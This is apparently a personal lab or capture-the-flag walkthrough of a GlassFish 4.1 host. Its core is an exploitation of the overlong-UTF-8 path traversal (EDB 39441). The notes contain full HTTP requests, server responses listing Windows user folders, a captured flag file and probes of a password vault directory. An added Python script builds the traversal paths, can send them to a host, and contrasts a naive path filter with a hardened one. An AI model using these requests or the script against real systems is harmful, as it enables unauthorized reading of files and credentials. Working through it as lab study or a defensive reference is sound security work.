## Enumeration
- `4848/tcp` - http - Sun GlassFish Open Source Edition
  - http-title: Login
- `8080/tcp` - http - Sun GlassFish
  - http-title: Data Web
- `445/tcp` - SMB
  - no null session
  - no guest login
- `3389/tcp` - Microsoft Terminal Services
### HTTP - `8080`
Mostly static.
There is a single input form here.
Should check whether "they" click links.
![[Pasted image 20250331184721.png]]
The Send button is fake/purely graphical; it submits nothing.
Directory enumeration with `ffuf` yields nothing either:
```
╭─[λ]-[/targets/fish]-[192.168.188.168]
╰─> ffuf -u http://$RHOST:8080/FUZZ -c -w /arsenal/wordlists/raft-large-files.txt -mc 200,301,302
```
### http://192.168.188.168:4848/j_security_check - Admin Console
![[Pasted image 20250331185209.png]]
![[Pasted image 20250331185228.png]]
**Credentials:**
- `admin:admin`
- `admin:`
- `admin:adminadmin`
None of them work.
**Directory Enumeration:**
Returns 200 for whatever you throw at it, so every hit is a false positive and the results are useless as-is; `ffuf -ac` (auto-calibrate) or `-fs <size>` to filter on response size would be needed to get anything meaningful out of it.
**Version enumeration & CVE lookup**
![[Pasted image 20250331185600.png]]
According to `nmap` we're dealing with `v4.1`:
```
4848/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-favicon: Unknown favicon MD5: 7EA0C3CBA45327AA04BCD69BE9754B9E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Login
```
![[Pasted image 20250331185858.png]]
`searchsploit` reveals a number of potential vulnerabilities, all of which seem related to directory traversal of some sort. The one of interest is EDB 39441, the GlassFish Server Open Source Edition 4.1 directory traversal (CVE-2017-1000028).
We'll copy over the non-Metasploit version:
```
╭─[λ]-[/targets/fish]-[192.168.188.168]
╰─> searchsploit -m 39441
```
```
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
Host: 192.168.188.168:4848
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
```
Yields a response:
```
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/AdoptOpenJDK/1.8)
Last-Modified: Sat, 30 Oct 2021 01:57:49 GMT
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
https://www.exploit-db.com/exploits/39441
So path traversal works. The trick is the `%c0%af` sequence: it is an overlong two-byte UTF-8 encoding of `/` (0x2F), so a filter looking for a literal `../` in the request path sees nothing, while the decoded path that reaches the file system still walks up the tree. The question is how to leverage that for further access.
At this point I'm taking a break to get snacks...
Not sure which file to request.
Refer to [[Path Traversal]] and [[Sensitive File Paths - Windows]].
`GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/`
Returns a listing of `C:\Users` (so the traversal gives us directory listings, not just file reads):
```
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/AdoptOpenJDK/1.8)
Last-Modified: Sat, 30 Oct 2021 02:23:43 GMT
Administrator
All Users
arthur
Default
Default User
desktop.ini
Public
```
`/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/arthur`
Lists the profile directory of `arthur`:
```
3D Objects
AppData
Application Data
Contacts
Cookies
Desktop
Documents
Downloads
Favorites
Links
Local Settings
Music
My Documents
NetHood
NTUSER.DAT
ntuser.dat.LOG1
ntuser.dat.LOG2
NTUSER.DAT{b98f8778-d034-11eb-b45f-0050568a4226}.TM.blf
NTUSER.DAT{b98f8778-d034-11eb-b45f-0050568a4226}.TMContainer00000000000000000001.regtrans-ms
NTUSER.DAT{b98f8778-d034-11eb-b45f-0050568a4226}.TMContainer00000000000000000002.regtrans-ms
ntuser.ini
OneDrive
Pictures
PrintHood
Recent
Saved Games
Searches
SendTo
Start Menu
Templates
Videos
```
We can get NTUSER.DAT, but I've got no idea how to decipher it....
I'm guessing we need to get some kind of credentials for RDP...
For some quick points we can go ahead and grab `local.txt`:
`/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/arthur/Desktop/local.txt`
```
c02c7431624d658c18d436c5de0e4062
```
Possible password. Listing the vault directory at:
`GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/arthur/Documents/TotalAV/PasswordVault/`
returns a single entry (unclear yet whether it is a file name or a value):
`42590410`
My theory at this point is that we would have to somehow download the password vault and then attempt to crack it??
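Added example (my own code, not part of the original notes or of EDB 39441) pulling the mechanics of the requests above into one script: it rebuilds the traversal path for any target under the drive root, shows why `%c0%af` decodes to `/` in a lenient UTF-8 decoder and is rejected by a strict one, contrasts the naive raw-path check with a hardened decode-then-check, and parses the one-name-per-line directory listings the server returns. The `/theme/com/sun` prefix and depth of 12 are taken from the requests on this page; `SAMPLE_LISTING` is the `/users/` response copied from above; host, port and `fetch_via_traversal` are assumptions and are not exercised offline.

```python
"""GlassFish 4.1 overlong-UTF-8 traversal helpers.

Added example, not code from these notes or from EDB 39441. Prefix and depth
come from the requests on this page; host/port used by fetch_via_traversal
are placeholders (assumption).
"""
import http.client
from urllib.parse import unquote_to_bytes

OVERLONG_SLASH = "%c0%af"  # two-byte overlong encoding of U+002F "/"


def build_traversal(target, depth=12, prefix="/theme/com/sun"):
    """Rebuild the request path used on this page: prefix, `depth` times
    overlong-slash + "..", then overlong-slash + target (relative to the
    drive root, e.g. "users/arthur/Desktop/local.txt")."""
    return prefix + (OVERLONG_SLASH + "..") * depth + OVERLONG_SLASH + target.lstrip("/")


def lenient_utf8_decode(data):
    """Decode ASCII and two-byte sequences WITHOUT the overlong check, which
    is exactly what turns C0 AF into "/". Other sequences are rejected to keep
    the toy decoder small."""
    out, i = [], 0
    while i < len(data):
        b0 = data[i]
        if b0 < 0x80:
            out.append(chr(b0))
            i += 1
        elif 0xC0 <= b0 <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b0 & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("unsupported byte sequence at offset %d" % i)
    return "".join(out)


def decode_request_path(raw_path, lenient):
    """Percent-decode to bytes, then UTF-8 decode. Strict mode (Python's
    default) raises UnicodeDecodeError on the overlong C0 AF pair."""
    data = unquote_to_bytes(raw_path)
    return lenient_utf8_decode(data) if lenient else data.decode("utf-8")


def escapes_root(path):
    """True if a "/"-separated path climbs above its starting directory."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def naive_check_allows(raw_path):
    """Vulnerable pattern: traversal check on the raw, undecoded path. The
    overlong slashes hide every ".." inside one big segment."""
    return not escapes_root(raw_path)


def hardened_check_allows(raw_path):
    """Fixed pattern: decode strictly first, reject malformed UTF-8 outright,
    then check the decoded path. Nothing is re-decoded after the check."""
    try:
        decoded = decode_request_path(raw_path, lenient=False)
    except UnicodeDecodeError:
        return False
    return not escapes_root(decoded)


def parse_listing(body):
    """Directory listings come back one name per line (see the /users/
    response above); turn the body into a list of entry names."""
    return [line.strip() for line in body.splitlines() if line.strip()]


# Copied from the /users/ listing on this page, for offline use.
SAMPLE_LISTING = "Administrator\nAll Users\narthur\nDefault\nDefault User\ndesktop.ini\nPublic\n"


def fetch_via_traversal(host, port, target, timeout=10):
    """Send the traversal request over plain HTTP; returns (status, body).
    Not exercised offline (host/port are assumptions)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", build_traversal(target), headers={"Host": "%s:%d" % (host, port)})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body


if __name__ == "__main__":
    p = build_traversal("windows/win.ini", prefix="/theme/META-INF/prototype")
    print(p)
    print("naive filter allows:   ", naive_check_allows(p))
    print("lenient decode escapes:", escapes_root(decode_request_path(p, lenient=True)))
    print("hardened filter allows:", hardened_check_allows(p))
    print(parse_listing(SAMPLE_LISTING))
```

Overshooting with twelve `..` segments is harmless on Windows, since `..` at the drive root just stays at the root, which is why the same prefix works for `windows/win.ini` and for `users/arthur/...` without knowing how deep the GlassFish install sits on disk.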
## Lessons Learned
- More Windows file system drilling
- More ffuf confidence
- Didn't have remote desktop installed on my new system....
- Completely missed the "Synaman" server during my enumeration
  - guess I forgot to "scan all ports"
- We'll need an RDP fix so we can hit the remote hosts directly from my admin machine too
  - it's gonna be weird to do like RDP->X so we'll need to be able to forward connections from my local machine onto the target system....